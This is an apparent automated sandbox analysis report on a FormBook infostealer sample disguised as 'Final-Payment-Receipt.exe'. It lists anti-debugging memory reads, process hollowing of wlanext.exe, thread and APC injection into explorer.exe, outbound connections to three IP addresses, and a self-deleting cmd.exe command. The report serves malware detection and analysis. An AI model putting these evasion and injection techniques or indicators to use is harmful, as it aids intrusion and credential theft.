          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D746D mov eax, dword ptr fs:[00000030h]1_2_013D746D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA44B mov eax, dword ptr fs:[00000030h]1_2_013EA44B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488CD6 mov eax, dword ptr fs:[00000030h]1_2_01488CD6
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C849B mov eax, dword ptr fs:[00000030h]1_2_013C849B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014714FB mov eax, dword ptr fs:[00000030h]1_2_014714FB
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3F33 mov eax, dword ptr fs:[00000030h]1_2_013E3F33
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EE730 mov eax, dword ptr fs:[00000030h]1_2_013EE730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471751 mov eax, dword ptr fs:[00000030h]1_2_01471751
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488F6A mov eax, dword ptr fs:[00000030h]1_2_01488F6A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DF716 mov eax, dword ptr fs:[00000030h]1_2_013DF716
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4710 mov eax, dword ptr fs:[00000030h]1_2_013E4710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CFF60 mov eax, dword ptr fs:[00000030h]1_2_013CFF60
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CEF40 mov eax, dword ptr fs:[00000030h]1_2_013CEF40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014717D2 mov eax, dword ptr fs:[00000030h]1_2_014717D2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8794 mov eax, dword ptr fs:[00000030h]1_2_013C8794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F37F5 mov eax, dword ptr fs:[00000030h]1_2_013F37F5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BE620 mov eax, dword ptr fs:[00000030h]1_2_013BE620
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E8E00 mov eax, dword ptr fs:[00000030h]1_2_013E8E00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471608 mov eax, dword ptr fs:[00000030h]1_2_01471608
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C766D mov eax, dword ptr fs:[00000030h]1_2_013C766D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FE3F mov eax, dword ptr fs:[00000030h]1_2_0146FE3F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FEC0 mov eax, dword ptr fs:[00000030h]1_2_0146FEC0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488ED6 mov eax, dword ptr fs:[00000030h]1_2_01488ED6
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FE87 mov eax, dword ptr fs:[00000030h]1_2_0144FE87
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E16E0 mov ecx, dword ptr fs:[00000030h]1_2_013E16E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C76E2 mov eax, dword ptr fs:[00000030h]1_2_013C76E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014346A7 mov eax, dword ptr fs:[00000030h]1_2_014346A7
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E36CC mov eax, dword ptr fs:[00000030h]1_2_013E36CC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F8EC7 mov eax, dword ptr fs:[00000030h]1_2_013F8EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]3_2_0372F370
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]3_2_0372F370
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]3_2_0372F370
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]3_2_03743B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]3_2_03743B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371DB60 mov ecx, dword ptr fs:[00000030h]3_2_0371DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E8B58 mov eax, dword ptr fs:[00000030h]3_2_037E8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371F358 mov eax, dword ptr fs:[00000030h]3_2_0371F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371DB40 mov eax, dword ptr fs:[00000030h]3_2_0371DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D131B mov eax, dword ptr fs:[00000030h]3_2_037D131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]3_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]3_2_037403E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373DBE9 mov eax, dword ptr fs:[00000030h]3_2_0373DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]3_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]3_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E3 mov eax, dword ptr fs:[00000030h]3_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037453C5 mov eax, dword ptr fs:[00000030h]3_2_037453C5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]3_2_037953CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]3_2_037953CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]3_2_03744BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]3_2_03744BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]3_2_03744BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E5BA5 mov eax, dword ptr fs:[00000030h]3_2_037E5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03742397 mov eax, dword ptr fs:[00000030h]3_2_03742397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374B390 mov eax, dword ptr fs:[00000030h]3_2_0374B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]3_2_0373EB9A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]3_2_0373EB9A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D138A mov eax, dword ptr fs:[00000030h]3_2_037D138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CD380 mov ecx, dword ptr fs:[00000030h]3_2_037CD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]3_2_03721B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]3_2_03721B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]3_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]3_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]3_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375927A mov eax, dword ptr fs:[00000030h]3_2_0375927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]3_2_037CB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]3_2_037CB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E8A62 mov eax, dword ptr fs:[00000030h]3_2_037E8A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]3_2_03755A69
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]3_2_03755A69
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.236.49 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 27.123.27.33 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeMemory written: C:\Users\user\Desktop\Final-Payment-Receipt.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E10000Jump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.242407386.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.235309423.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Users\user\Desktop\Final-Payment-Receipt.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
